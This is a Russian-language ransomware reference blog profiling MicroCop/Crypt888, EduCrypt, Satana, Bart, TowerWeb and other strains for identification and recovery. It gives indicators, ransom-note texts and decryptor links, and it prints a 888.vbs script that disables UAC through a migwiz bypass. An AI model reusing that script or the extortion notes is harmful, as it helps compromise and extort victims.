MicroCop

MicroCop Ransomware

Aliases: MirCop, Crypt888

MicroCop NextGen Ransomware

(шифровальщик-вымогатель)

Translation into English

   Этот крипто-вымогатель шифрует файлы с помощью DES-шифрования, а затем требует вернуть якобы украденные 48,48 биткоинов. На самом деле банально вымогает выкуп. По сути это один из самых крупных выкупов в истории крипто-вымогательства последних лет. Имеет другое название: Crypt888. Написан на AutoIt. 

Обнаружения: 

DrWeb -> W97M.DownLoader.1560, Trojan.PWS.Siggen1.54140, Trojan.MulDrop5.13451, Trojan.Encoder.24597, Trojan.Bankfraud.3628

ALYac -> Dropped:Trojan.Generic.17350659, Trojan.Ransom.Crypt888

Avira (no cloud) -> HEUR/Macro.Agent, DR/AutoIt.Gen

BitDefender -> Generic.Ransom.Locked.3D08AF5C, AIT:Trojan.Nymeria.2448

ESET-NOD32 -> Win32/Spy.Banker.ADES, Multiple Detections, A Variant Of Win32/Filecoder.Crypt888.B

Malwarebytes -> Ransom.Microcop

Microsoft -> Ransom:Win32/Pocrimcrypt.A, Ransom:AutoIt/Lokmwiz.A

Rising -> Spyware.Banker!8.8D (CLOUD), Ransom.Lokmwiz!8.E16C*

Symantec -> Ransom.Cryptolocker, Ransom.CryptXXX

Tencent -> Win32.Trojan-banker.Agent.Wsan, Win32.Trojan-banker.Agent.Hrzc

TrendMicro -> Ransom_MIRCOP.G, Ransom_MIRCOP.H

К зашифрованным файлам добавляется не расширение, а приставка Lock. Таким образом зашифрованный файл выглядит так: Lock.original_name.png

Также приставка Lock. добавляется к папкам с файлами и к ярлыкам на Рабочем столе. 

  На скринлоке (графическом варианте записки о выкупе, который ставит обоями на рабочем столе файл wl.jpg), можно видеть фигуру в капюшоне и в маске Гая Фокса. Изображение позаимствовано у известной музыкальной группы Hacktivist, а текст просто заменен другим.  Эту маску также использует хакерская группа Anonymous. 

  В конце записки приводится Bitcoin-адрес, на который нужно перевести сумму выкупа. Никаких инструкций для жертвы вымогательства не предоставляется. Видимо, предполагается, что в "век развитого компьютерного вымогательства" все уже должны знать, что такое биткоины, как их получать и переводить другим. 

Текст со скринлока:
Hello.
You've stolen 48.48 BTC from the wrong people, please be so kind to return them and we will return your files.
Don't take us for fools, we know more about you than you know about yourself.
Pay us back and we won't take further action, don't pay and be prepared.
Bitcoin address...

Перевод на русский:
Привет.
Вы украли 48.48 BTC не у тех людей, потому будьте любезны вернуть их, и мы вернем ваши файлы.
Не считайте нас дураками, мы знаем о вас больше, чем вы знаете о себе.
Верните и мы тогда не зайдём дальше, не заплатите, будьте готовы.
Bitcoin-адрес...

Примечательно, что кроме биткоин-адреса для оплаты, вымогатели не дают пострадавшей стороне никаких контактов для связи. 

  Распространяется MirCop через email-спам с вложенным документом. Документ якобы от таможни Таиланда, который используется при импорте или экспорте товаров. В нем скрыт вредоносный макрос, который использует Windows PowerShell, чтобы выполнить загрузку собственно криптовымогателя. Злоумышленники используют специальный текст, запрашивающий разрешение на включение макросов для правильного отображения содержимого документа. Расcчитан на неопытных и излишне любопытных. 

  После полученного разрешения браузер пользователя перенаправляется на некий сайт магазина для взрослых на голландском языке, возможно давно взломанный, где размещены вредоносные файлы. Пока жертва его смотрит, на ПК начинается вредоносная деятельность: три файла загружаются в папку %TEMP%. Один из них, с именем c.exe, запускает процедуру, которая ворует пользовательскую информацию (логин-пароли из всех популярных браузеров, из FileZilla, Skype и другие данные). Два других, x.exe и y.exe, начинают шифрование файлов. В автозагрузку добавляется ярлык MicroCop.lnk, запускающий файл x.exe из директории Temp, выполняющий шифрование. 

Как видно из скриншота выше, шифрованию подвержены файлы в пользовательских директориях: Рабочий стол, Музыка, Изображения, Видео, Документы, в том числе и в общих папках. 

Файлы, связанные с MirCop Ransomware:
C:\Users\User-Name\AppData\Local\Temp\8x8x8
C:\Users\User-Name\AppData\Local\Temp\x.exe
C:\Users\User-Name\AppData\Local\Temp\y.exe
C:\Users\User-Name\AppData\Local\Temp\wl.jpg 
C:\Users\User-Name\AppData\Local\VCGTUY.vBS
C:\Users\User-Name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicroCop.lnk

Файлы, связанные с хищением паролей:
C:\Users\User-Name\AppData\Local\Temp\c.exe
C:\Users\User-Name\AppData\Local\Temp\putty.exe
C:\Users\User-Name\AppData\Local\PassW8.txt
C:\Users\User-Name\AppData\Local\Sqlite.dll
C:\Users\User-Name\AppData\Local\aut1.tmp

Записи реестра, связанные с MirCop Ransomware:
HKCU\Control Panel\Desktop\Wallpaper "%UserProfile%\AppData\Local\Temp\wl.jpg"

Вредонос определяется TrendMicro как RANSOM_MIRCOP.A
TrendMicro сокращает названия вредоносов до 6 букв. Так название ярлыка в автозагрузке MicroCop стало MIRCOP. 

Записи реестра, связанные с этим Ransomware:

См. ниже результаты анализов.

Сетевые подключения и связи:

См. ниже результаты анализов.

Результаты анализов:

Гибридный анализ >>

VirusTotal анализ >>  VT>  VT>  VT>

---

Гибридный анализ на файл PuTTY.exe >>
VirusTotal анализ на файл PuTTY.exe >>

Степень распространённости: средняя. 

Подробные сведения собираются. 

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Обновление от 14 ноября 2017:

Пост в Твиттере >>

Результаты анализов: VT

<< Скриншот записки 

Обновление от 29 ноября 2017:

Пост в Твиттере >> 
🎥 Видеообзор >>  Спасибо GrujaRS! 
Email: maya_157_ransom@hotmail.com
Использован: Private Builder Ransomware V2.01.exe
Результаты анализов: VT + HA
<< Комбо-скриншот с текстом о выкупе и файлами


Файлы: %TEMP%\888.vbs
%TEMP%\aut4724.tmp
%TEMP%\aut48A2.tmp
%TEMP%\aut48AD.tmp
%TEMP%\fuoodkv

=== 2020 ===

Обновление от 10 февраля 2020: 
Пост в Твиттере >>
Расширение к файлам: .bhacks
Приставка к папкам: Lock.
Записка: 200 dollars.txt
Также используется изображение, заменяющее обои Рабочего стола. 

 

Email: bhacks740@gmail.com
Файл EXE: kkk ransomware.exe
Результаты анализов: VT + VMR 


Обновление от 29 июня 2020:

Приставка к файлам: Lock.

Email: j0ra@protonmail.com

Результаты анализов: VT + AR
Файл скрипта: 888.vbs
Файл изображения: wl.jpg

Обновление от 20 августа 2020:
Написан на AutoIt v3. 
Пост в Твиттере >>
Мой пост в Твиттере >>
Приставка к файлам: Lock.
Записка: README.txt
Email: sp00f3rsupp0rt@protonmail.com
Файл скрипта: 888.vbs
Файл изображения: wl.jpg
Специальный файл: 8x8x8
Исполняемые файлы: kekw.exe, x.exe, migwiz.exe, reg.exe
Результаты анализов: VT + AR + IA
---

➤ Содержание файла  README.txt:
Looks like your files have been encrypted.
Contact us: sp00f3rsupp0rt@protonmail.com
to decrypt your files have a nice day
---
Текст записки дублируется в экране блокировки, который появляется первым. Затем вместо обоев встает изображение с красными буквами на чёрном фоне.

 

---
➤ Содержание файла: 888.vbs
File = "C:\Windows\System32\cmd.exe"
Set shll = CreateObject("Wscript.Shell")
shll.run("C:\Windows\System32\migwiz\migwiz.exe " & File & " /c %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"),0,falseFile = "C:\Windows\System32\cmd.exe"
Set shll = CreateObject("Wscript.Shell")
shll.run("C:\Windows\System32\migwiz\migwiz.exe " & File & " /c %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"),0,false
---

Обновление от 28 ноября 2020: 

Пост в Твиттере >>

По факту: Korean Crypt888

Самоназвания: HexadecimalDecryptor 1.0

Hexadecimal Ransomware Decryptor

Приставка к файлам: Lock.

Файлы изображений: wl.jpg, img0.jpg

Файлы: HexInformation.exe, HexDecryptor.exe, HexLocker.exe, WindowsSystemTools.exe

Результаты анализов: VT + TG + VMR

 

Вариант от 18 декабря 2020:

Сообщение >>

Самоназвание: Angry Lola Loud Ran$omware

Файлы: 888.vbs, wl.jpg

Файл: Angry Lola Loud Ran$omware.exe

Результаты анализов: VT + VMR

➤ Обнаружения: 

DrWeb -> Trojan.Encoder.24597

ALYac -> Generic.Ransom.Locked.3D08AF5C

Avira (no cloud) -> TR/Bancker.8888

BitDefender -> Generic.Ransom.Locked.3D08AF5C

ESET-NOD32 -> Multiple Detections

Kaspersky -> HEUR:Exploit.Script.BypassUAC.gen

Kingsoft -> Win32.Troj.Banker.(kcloud)

Symantec -> Ransom.Cryptolocker

TrendMicro -> Ransom.AutoIt.CRYPTEIGHT.SMTH

=== 2021 ===

Варианты от 23-24 мая 2021: 

Сообщение >>

Самоназвание: Project_Robux

Расширение: Lock.

Ссылка на анализ >> 

---

Сообщение >>

Расширение: Lock.

Ссылка на анализ >>

---

Сообщение >>

Самоназвание: KarLocker

Расширение: Lock.

Ссылка на анализ >>

=== 2022 ===

Вариант от 22 мая 2022:

Сообщение >>

Расширение: Lock.

Результаты анализов: VT + AR

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

Внимание!
Для зашифрованных файлов есть дешифровщик (дешифратор).
Скачать дешифровщик для Crypt888 >>
*
*
*

 Read to links: 
 Tweet on Twitter
 ID Ransomware (ID as MirCop)
 Write-up, Topic of Support

 Thanks: 
 BleepingComputer, Michael Gillespie, Jakub Kroustek
 Andrew Ivanov (article author)
 и тем, кто присылает обновления

© Amigo-A (Andrew Ivanov): All blog articles.

EduCrypt, HiddenTear 2.0

EduCrypt Ransomware 

HiddenTear 2.0 Ransomware 

(шифровальщик-вымогатель, шифровальщик-обучатель)

  Этот крипто-вымогатель шифрует файлы с помощью AES со случайным именем, а затем предлагает загрузить декриптер для бесплатной дешифровки. 

Зашифрованные файлы получают расширение .isis 

  HiddenTear 2.0 — это оригинальное название вымогателя, но некоторые исследователи предпочли назвать его EduCrypt, считая его "обучающим вымогателем" (Eduware), что само по себе абсурдно, какое это обучающее пособие... Но в ID Ransomware этот вымогатель теперь записан как EduCrypt.

О шифровальщиках-обучателях читайте в Глоссарии. 

  Шифровальщик HiddenTear 2.0 основан на урезанной версии оригинального Hidden Tear. Он имеет ограниченный набор папок, в которых шифрует файлы, небольшое количество целевых файловых расширений и не обменивается данными с C&C-сервером.

При запуске криптовымогателя шифруются файлы в следующих папках:
%UserProfile%\Desktop
%UserProfile%\Downloads
%UserProfile%\Documents
%UserProfile%\Pictures
%UserProfile%\Music
%UserProfile%\Videos

Список файловых расширений, подвергающихся шифрованию:
.asp, .aspx, .avi, .bat, .bk, .bmp, .css, .csv, .divx, .doc, .docx, .exe, .html, .index, .jpg, .lnk, .mdb, .mkv, .mov, .mp3, .mp4, .mpeg, .odt, .ogg, .pdf, .php, .png, .ppt, .pptx, .psd, .rar, .sln, .sql, .txt, .wav, .wma, .wmv, .xls, .xlsx, .xml, .zip (41 расширение).

По окончании шифрования на рабочем столе создается файл-записка README.txt. Там сообщается о том, что случилось с файлами жертвы и даётся ссылка на дешифратор. 

Записка о выкупе

Декриптер от вымогателей

Содержание записки от вымогателей:
Well hello there, seems you have a virus! Well you are going to get the decryptor which is here http://www.filedropper.com/decrypter_1 Don't 
Download Random Shit On The Internet. A Hidden .txt File Has Been Created With The Decrypt Password! Find It!..

Перевод на русский язык:
Ну привет, кажется, у тебя есть вирус! Ну ты можешь получить декриптор, который здесь http://www.filedropper.com/decrypter_1 
Не качай всякое дерьмо из Интернета. Был создан скрытый txt-файл DecryptPassword.txt! Найди его!..

Пароль для дешифрования HDJ7D-HF54D-8DN7D сохраняется в "Documents" (Мои документы) в скрытый файл "DecryptPassword.txt". Он является единым для всех пострадавших от этой программы-вымогателя.

Файл с паролем

Замечено распространение этого вредоноса с загрузкам из Интернета, с иконкой Skype в стиле оригами и названием файла "skypetool.exe". 

Пострадавшим лучше НЕ использовать декриптор от вымогателей, который ищет только файлы с расширением .locked, запрограммированным в оригинальном HiddenTear, и не ищет файлы с расширением .isis, которое использует данный криптовымогатель. 

Разумнее использовать уже проверенный универсальный дешифровщик от Майкла Джиллеспи, в котором можно добавить любое расширение.

Скачать HiddenTear Decrypter с сайта Bleeping Computer >>

Рекомендуется сначала попробовать дешифровать 1-2 файла, чтобы получить положительный результат. И лишь потом указать на другие папки с зашифрованными файлами. 

 Read to links: 
 Write-up on BC
 ID Ransomware (ID as EduCrypt)
 *

 Thanks: 
 Lawrence Abrams
 Michael Gillespie
 *
 

© Amigo-A (Andrew Ivanov): All blog articles.


Remove HiddenTear 2.0 Decrypt EduCrypt Decode Restore files Recovery data Удалить HiddenTear Дешифровать Расшифровать Восстановить файлы

Satana

Satana Ransomware

(шифровальщик-вымогатель, MBR-модификатор)

   Этот крипто-вымогатель шифрует данные пользователей с помощью AES-256+RSA, а затем требует выкуп в 0,5 биткоинов, чтобы вернуть файлы обратно. Выкуп должен быть уплачен в течение 7 дней, иначе по истечении недели дешифровка станет невозможной. 

Обнаружения:
DrWeb -> Trojan.MBRlock.253 + Trojan.MBRlock.19
BitDefender -> Trojan.Ransom.Satan.A, Trojan.Generic.17389935
ESET-NOD32 -> Win32/MBRlock.AO, A Variant Of Win32/MBRlock.AO
Kaspersky -> Trojan-Ransom.Win32.Satan.f, Trojan-Ransom.Win32.Satan.g + Trojan-Ransom.Boot.Siob.a
Malwarebytes -> Ransom.CryptoLocker, Ransom.Satana
TrendMicro -> Ransom_SATANA.A, Ransom_SATANA.B, Ransom_SATANA.D
Symantec -> Trojan.Gen.2, Ransom.Cerber

© Генеалогия: Satana Ransomware >> CoronaVirus Ransomware

   Во время шифрования SATANA изменяет имя каждого зашифрованного файла в следующем формате: Gricakova@techemail.com_[original file name]. 

Например, файл photo.jpg  будет переименован в Gricakova@techemail.com_photo.jpg

  Цели шифрования: базы данных, документы, PDF, фотографии, музыка, видео и пр. на локальных и сетевых дисках, в том числе и на неотображаемых сетевых ресурсах. Примечательно, что миниатюры зашифрованных файлов изображений показывают не пустое изображение, а реальную миниатюру. 

  По окончании шифрования перед жертвой выходит сообщение о выкупе. Записки о выкупе называются !satana!.txt и размещаются в каждой папке с зашифрованными файлами. 

 
  После перезагрузки ПК на экране на чёрном фоне выводится красный устрашающий текст.  

Текст с экрана:
You had bad luck. There was crypting of all your files in a FS bootkit virus <!SATANA!>
To decrypt you need send on this E-mail: banetnatia@mail.com your private code: 14B4030A8A7F8B8D7B1101720567C27E and pay on a Bitcoin Wallet: XjU81vkJn4kExpBE2r92tcA3zXVdbfux6T total 0,5 btc After that during 1 - 2 days the software will be sent to you - decryptor - and the necessary instructions. All changes in hardware configurations of your computer can make the decryption of your files absolutely impossible! Decryption of your files is possible only on your PC! Recovery is possible during 7 days, after which the program - decryptor - can not ask for the necessary signature from a public certificate server. Please contact via e-mail, which you can find as yet in the form of a text document in a folder with encrypted files, as well as in the name of all encrypted files.If you do not appreciate your files we recommend you format all your disks and reinstall the system. Read carefully this warning as it is no longer able to see at startup of the computer. We remind once again- it is all serious! Do not touch the configuration of your computer!
E-mail: banetnatia@mail.com - this is our mail
CODE: 14B4030A8A7F8B8D7B1101720567C27E this is code; you must send
BTC: XjU81vkJn4kExpBE2r92tcA3zXVdbfux6T here need to pay 0,5 bitcoins
How to pay on the Bitcoin wallet you can easily find on the Internet. Enter your unlock code, obtained by E-mail here and press "ENTER" to
continue the normal download on your computer. Good luck! May God help you!
<!SATANA!>

Перевод на русский язык:
Вам не везло. Все ваши файлы зашифровал FS буткит-вирус <!SATANA!>
Для дешифровки отправьте на почту: banetnatia@mail.com ваш код: 14B4030A8A7F8B8D7B1101720567C27E и оплатите на Bitcoin-кошелек: XjU81vkJn4kExpBE2r92tcA3zXVdbfux6T всего 0,5 BTC. В течение 1-2 дней вам будет отправлен дешифровщик и инструкции. Изменения в аппаратной конфигурации вашего компьютера могут сделать дешифровку файлов невозможной! Дешифровка файлов возможна только на вашем ПК! Восстановление возможно в течение 7 дней, после чего программа - декриптор - не сможет получить с сервера подписанный сертификат. Свяжитесь с нами по email, который можно найти еще в текстовом документе в папке с зашифрованными файлами, а также в  имени всех зашифрованных файлов. Если вы не цените свои файлы, мы рекомендуем отформатировать все диски и переустановить систему. Внимательно прочтите это предупреждение, т.к. его не будет при следующем запуске ПК. Напоминаем - это все серьезно! Не меняйте конфигурацию вашего ПК!
E-mail: banetnatia@mail.com - это наша почта
КОД: 14B4030A8A7F8B8D7B1101720567C27E этот код вы должны прислать
BTC: XjU81vkJn4kExpBE2r92tcA3zXVdbfux6T сюда нужно заплатить 0,5 Bitcoins
Как платить на Bitcoin-кошелек можно легко найти в Интернете. Введите код разблокировки, полученный по E-mail здесь и нажмите "ENTER", чтобы продолжить нормальную загрузку ПК. Удачи! Да поможет вам Бог!

Кроме указанного в записке адреса banetnatia@mail.com могут быть другие, в их числе Kharpov_igor@mail.com, matusik11@techemail.com, megrela777@gmail.com, rayankirr@gmail.com, ryanqw31@gmail.com, Sarah_G@ausi.com и др.

Вымогателями нарочно подобраны адресаты из разных стран, видимо, осуществляются целенаправленные рассылки по странам и регионам. 

Список файловых расширений, подвергающихся шифрованию:
.1cd, .3ds, .3gp, .7z, .acc, .apk, .asm, .avi, .bak, .bmp, .c, .cal, .casb, .ccp, .cdr, .cer, .chm, .ckp, .cmx, .conf, .cpp, .cr2, .cry, .cs, .css, .csv, .dacpac, .dat, .db, .db3, .dbf, .dbx, .dcx, .dgn, .djvu, .doc, .docm, .docx, .dwg, .dxf, .epub, .fb2, .flv, .gbr, .gho, .gif, .gz, .ibooks, .iso, .java, .jpe, .jpeg, .jpg, .js, .key, .ma, .md2, .mdb, .mdf, .mht, .mhtm, .mkv, .mobi, .mov, .mp3, .mp4, .mpeg, .mpg, .mrg, .ods, .odt, .pas, .pdb, .pdf, .php, .pict, .pkg, .png, .pps, .ppsx, .ppt, .pptx, .psd, .psp, .py, .rar, .rb, .rbw, .rtf, .sav, .scr, .sdf, .sql, .sqlite, .sqlite3, .sqlitedb, .stl, .swf, .tax, .tbl, .tex, .tif, .tiff, .torrent, .txt, .v2i, .vpd, .vsd, .wmv, .xls, .xlsx, .xml, .xps, .zip (114 расширений).

После шифрования Satana удаляет теневые копии файлов и автоматически перезагружает ПК. 

Важно отметить, что Satana, в отличие от других вымогателей, изменяет параметры загрузки компьютера. Он заменяет Master Boot Record на свой вредоносный загрузчик с бутлокером и выводит на экран вымогательский текст. После перезагрузки ПК потерпевшие не смогут получить доступ к своему рабочему столу, т.к. им будут отображаться требования вымогателя. 

К сожалению, пока нет никаких дешифровщиков для этого вымогателя и нет никакого другого способа восстановления файлов и системы из резервной копии.

Статья от MalwareBytes >>

Результаты анализов:
Ⓗ Hybrid analysis >>  HA>> HA>>
𝚺  VirusTotal analysis >>  VT>> VT>>
𝚺  VirusTotal analysis (bootloader + 'kernel') >>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>

Степень распространённости: средняя. 
Подробные сведения собираются регулярно.

© Amigo-A (Andrew Ivanov): All blog articles.

Bart

Bart Ransomware

(фейк-шифровальщик в 1-й версии)

(шифровальщик-вымогатель во 2-й версии)

   Этот вымогатель якобы шифрует данные пользователей, а затем требует выкуп в 3 биткоина, чтобы вернуть файлы обратно. На самом деле файлы помещаются в запароленный архив, а вымогатель работает без предварительного подключения к C&C-серверу. Bart — оригинальное название, данное ему его создателями. Вполне возможно, что в честь Барта Симпсона из мульсериала "Симпсоны". 

Remove Bart Decrypt Bart.zip Decode Restore files Recovery data Удалить Bart Дешифровать Расшифровать Восстановить файлы

  Заблокированные файлы получают расширение .bart.zip. Цели вымогателя: базы данных, документы и их шаблоны, PDF, фотографии, музыка, видео и пр. 

Для открытия файлов bart.zip требуется ввести пароль.

  Записок с требованием выкупа две: текстовая recover.txt (в каждой папке с заблокированными файлами) и recover.bmp (для замены обоев рабочего стола). 

  Для распространения используется спам-кампания с zip-вложениями, содержащими JavaScript-код. При неосторожном запуске содержимого вложения будет загружен и установлен загрузчик RockLoader, который загрузит Bart Ransomware. Тема писем называется "Photos", а вложения могут быть следующие photos.zip, image.zip, Photos.zip, photo.zip, Photo.zip, picture.zip. В архивах находится JavaScript-файл, например, PDF_123456789.js 

  Bart проверяет язык системы и не запускает блокирование файлов, если язык системы пользователя русский, украинский или белорусский. Определив язык, на котором работает система, предлагает соответствующую записку с требованием выкупа на итальянском, французском, немецком и испанском языках. 

Список файловых расширений, подвергающихся блокированию:
.123, .3dm, .3ds, .3g2, .3gp, .602, .aes, .arc, .asc, .asf, .asm, .asp, .avi, .bak, .bat, .bmp, .brd, .cgm, .cmd, .cpp, .crt, .csr, .csv, .dbf, .dch, .dif, .dip, .djv, .djvu, .doc, .docb, .docm, .docx, .dot, .dotm, .dotx, .fla, .flv, .frm, .gif, .gpg, .hwp, .ibd, .jar, .java, .jpeg, .jpg, .key, .lay, .lay6, .ldf, .m3u, .m4u, .max, .mdb, .mdf, .mid, .mkv, .mov, .mp3, .mp4, .mpeg, .mpg, .ms11, .myf, .myi, .nef, .odb, .odg, .odp, .ods, .odt, .otg, .otp, .ots, .ott, .p12, .paq, .pas, .pdf, .pem, .php, .png, .pot, .potm, .potx, .ppam, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, .psd, .rar, .raw, .rtf, .sch, .sldm, .sldx, .slk, .stc, .std, .sti, .stw, .svg, .swf, .sxc, .sxd, .sxi, .sxm, .sxw, .tar, .tbk, .tgz, .tif, .tiff, .txt, .uop, .uot, .vbs, .vdi, .vmdk, .vmx, .vob, .wav, .wb2, .wk1, .wks, .wma, .wmv, .xlc, .xlm, .xls, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .zip (142 расширения)

Уплата выкупа производится на платежном портале Decryptor Bart, который очень похож на тот, который используется Locky. Необходимая информация о зараженной машине, скорее всего, передается на сервер оплаты в параметре URL "ID". 

Т.к. файлы всё же не шифруются, то Bart Ransomware 1-й версии можно отнести к фейк-шифровальщикам. Но более новые версии уже шифруют файлы. 

Обновление от 18 августа 2016:
Новая версия: Bart 2.0
Новое расширение: .bart (без zip).
Записка с тем же названием, но содержание изменено: recover.txt

Обновление от 18 октября 2016:
Новая версия: Bart 2.5
Новое расширение: .perl (без zip).

Записка с тем же названием, но содержание изменено: recover.txt
Анализы: HA, VT

Степень распространённости: средняя. 
Подробные сведения собираются.

Внимание!

Для зашифрованных файлов есть декриптер

1. Скачать декриптер для Bart Ransomware >>>
2. Скачать декриптер для Bart Ransomware новых версий >>
Для дешифрования файлов нужно подключение к Интернету. 

TowerWeb

TowerWeb Ransonware

(фейк-шифровальщик)

   Этот крипто-вымогатель якобы шифрует данные, а затем требует выкуп 100 долларов в биткоинах. Эту сумму нужно уплатить в течение 24 часов, иначе через сутки она возрастет до 150 долларов. По прошествии 72 часов без уплаты выкупа все файлы и сама операционная система будут удалены. 

  Вместо текстовой записки о выкупе используется изображение Payment_Instructions.jpg, которое ставится в качестве обоев рабочего стола. 

Считанное с экрана содержание:
............WRITE THIS INFORMATION DOWN............
Ransom Id: ***
BTC Address: ***
Email: towerweb@yandex.com
IF YOU LOOSE THIS INFO YOU WILL NOT BE ABLE TO CONTACT
............WRITE THIS INFORMATION DOWN............

YOU WILL NEED TO USE ANOTHER
DEVICE TO EMAIL US. YOUR
COMPUTER WILL NOT FUNCTION PROPERLY
UNTIL YOU PAY.

Your computer files have been encrypted moved to a hidden ENCRYPTED partition in your computer.
You must pay $100 USD within 24 hours or $150 after 24 hours in Bltcoint to get them back.
After 72 hours all files will be deleted including your operating system.

If you do not have Bitcoin visit www.LocalBitcoins.com to purchase them.
Email us if you need assistance or have paid.

Email: towerweb@yandex.com

In the mean time you will notice your computer will not respond to your commands.
Dont worry... everything will be back to normal when you pay.
Once you pay all your files and programs will be decrypted and your computer restored quickly.
Without the decryption password you will not get them back and your computer will not function properly.
Once payment is received you will get the decryption password and simple instructions to restore all
your files and computer to normal instantly. Takes about five minutes to restore everything to normal.
Once again... after 72 hours all files will be deleted including your operating system.

Email us if you need assistance or have paid.
Email: towerweb@yandex.com

The same information is on your desktop.
DO NOT LOOSE THE CONTACT INFO

HINT: IF YOU CANT CLICK ON ANYTHING YOUR
MOUSE BUTTONS HAVE ALREADY BEEN REVERSED.
MORE CHANGES WILL COME UNTIL YOU PAY.

Перевод фрагмента на русский язык:
***
Ваши компьютерные файлы были зашифрованы и перемещены в скрытый зашифрованный раздел в вашем компьютере.
Вы должны заплатить $ 100 долларов в течение 24 часов или $ 150 после 24 часов в Bltcoint, чтобы получить их обратно.
Через 72 часа все файлы будут удалены, в том числе операционная система.
***


Первая характерная особенность: на самом деле этот вымогатель не шифрует файлы, а сходу удаляет их специальной командой. Буквально, это не криптовымогатель, а винлок, позиционирующий себя как шифровальщик. Детект на VirusTotal + ещё один.  

Вторая характерная особенность: вымогатель меняет местами кнопки мыши, как будто играя с жертвой. Для выполнения этого фокуса используется следующая команда: RUNDLL32 USER32.DLL,SwapMouseButton

Внимание!  Если вы пострадали от этого криптовымогателя, то вам следует обратиться за помощью на форум bleepingcomputer.com

Дополнения от 24.06.2013
Возросла сумма выкупа: до $125 за 24 часа и $199 после.
Сменилось изображение с текстом вымогателя.  

Разновидностью или подражанием TowerWeb является вымогатель AnonPop, в котором используется аналогичное этому изображение для блокировщика экрана. Разница только в emai-адресе. 

Т.к. файлы всё же не шифруются, то TowerWeb Ransomware я отношу к фейк-шифровальщикам. 

Степень распространённости: низкая. 
Подробные сведения собираются

KratosCrypt

KratosCrypt Ransomware

(шифровальщик-вымогатель)

   Этот крипто-вымогатель шифрует данные с помощью AES-256, а затем требует выкуп в 0.03 биткоина. 

© Генеалогия: Hidden Tear >> KratosCrypt 

К зашифрованным файлам добавляется расширение .kratos. Криптовымогатель основан на Hidden Tear. 

  Записка о выкупе называется README_ALL.html и оставляется в каждой папке с зашифрованными файлами. 

Содержание записки о выкупе:
KratosCrypt 
Your documents, photos, databases and other important files have been encrypted!
To decrypt your files you need to buy the special software - "Kratos Decryptor".
The purchase should be performed via  network only at a special price: BTC0.03.
How to get "Kratos Decryptor" ?
1- Create a Bitcoin Wallet (we recommend Blockchain.info)
2- Buy necessary amount of Bitcoins
Do not forget about the transaction commision in the Bitcoin network (0.0005 BTC).
Here are our recommendations:
LocalBitcoins.com - The fastest and easiest way to buy and sell Bitcoins;
CoinCafe.com - The simplest and fastest way to buy, sell and use Bitcoins;
BTCDirect.eu - The best for Europe;
CEX.IO - VISA / MasterCard;
CoinMama.com - VISA / MasterCard;
HowToBuyBitcoins.info - Discover quickly how to buy and sell bitcoins in your local currency;
3- Send BTC0.03 to the following Bitocoin Address:
1FQJEfRizDMGw4bvw7k7Bfy3jg1FBxxQMC
4- Send an E-mail to this address containing the TRANSACTION ID:
kratosdimetrici@gmail.com
5- You will receive an E-mail containing the download link + PASSWORD.


Перевод на русский язык:
Ваши документы, фото, базы данных и другие важные файлы зашифрованы!
Для дешифровки файлов вам надо купить специальный софт - "Kratos Decryptor".
Покупка осуществляется только через сеть по специальной цене: BTC0.03.
Как получить "Kratos Decryptor"?
1- Создайте Bitcoin-кошелек (мы рекомендуем Blockchain.info)
2- Купите требуемое количество Bitcoins
Не забывайте о комисси транзакции в сети Bitcoin (BTC) 0,0005.
Вот наши рекомендации:
LocalBitcoins.com - Самый быстрый и простой способ купить и продать Bitcoins;
CoinCafe.com - Самый простой и быстрый способ купить, продать и иметь Bitcoins;
BTCDirect.eu - Лучший для Европы;
CEX.IO - VISA / MasterCard;
CoinMama.com - VISA / MasterCard;
HowToBuyBitcoins.info - Узнать, как быстро купить и продать Bitcoins в местной валюте;
3- Отправить BTC0.03 на Bitocoin-адрес:
1FQJEfRizDMGw4bvw7k7Bfy3jg1FBxxQMC
4- Отправить email на этот адрес идентификатор транзакции:
kratosdimetrici@gmail.com
5- Вы получите email, содержащее ссылку для загрузки + ПАРОЛЬ.

Внимание!  Этот криптовымогатель дешифруем. 
За помощью в дешифровке обращайтесь на форум bleepingcomputer.com

Сетевые подключения и связи:
Email: kratosdimetrici@gmail.com

Степень распространённости: низкая. 

Подробные сведения собираются

SecureCryptor

SecureCryptor Ransomware

(шифровальщик-вымогатель)

  Этот криптовымогатель шифрует данные жертвы, а затем требует написать на почту и прислать 1-2 зашифрованных файла. В ответном письме будет указана сумма выкупа за дешифровку. 

К зашифрованным файлам добавляется расширения .SecureCrypted или .bleepYourData.

© Генеалогия: Apocalypse > SecureCryptor

  Записка о выкупе создается на каждый зашифрованный файл по шаблону <original filename>.Contact_Here_To_Recover_Your_Files.txt. 
Таким образом для файла Новый документ.doc записка о выкупе будет называться: Новый документ.doc.Contact_Here_To_Recover_Your_Files.txt

В записке о выкупе фигурирует почтовый адрес: recoveryhelp@bk.ru

Содержание записки о выкупе:
A L L  Y O U R  F I L E S   A R E  E N C R Y P T E D
All your data - documents, photos, videos, backups - everything is encrypted.
The only way to recover your files:  contact us to the next email: recoveryhelp@bk.ru

Attach to e-mail:
1. Text with your IP server as Subject (To locate your encryption algoritm)
2. 1-2 encrypted files (please dont send files bigger than 1 MB)

We will check the encrypted file and send to you an email with your decrypted file as proof that we actually have the decrypter software.

Remember: 
1. The FASTER you'll CONTACT US - the FASTER you will RECOVER your files.
2. We will ignore your e-mails without IP server number in Subject. 
3. If you haven't received reply from us in 24 hours - try to contact us via public e-mail services such as Yahoo or so.

Перевод на русский язык:
ВСЕ ВАШИ ФАЙЛЫ ЗАШИФРОВАНЫ
Все ваши данные - документы, фото, видео, бэкапы - все зашифровано.
Один способ вернуть файлы: написать нам на почту recoveryhelp@bk.ru

Приложить к письму:
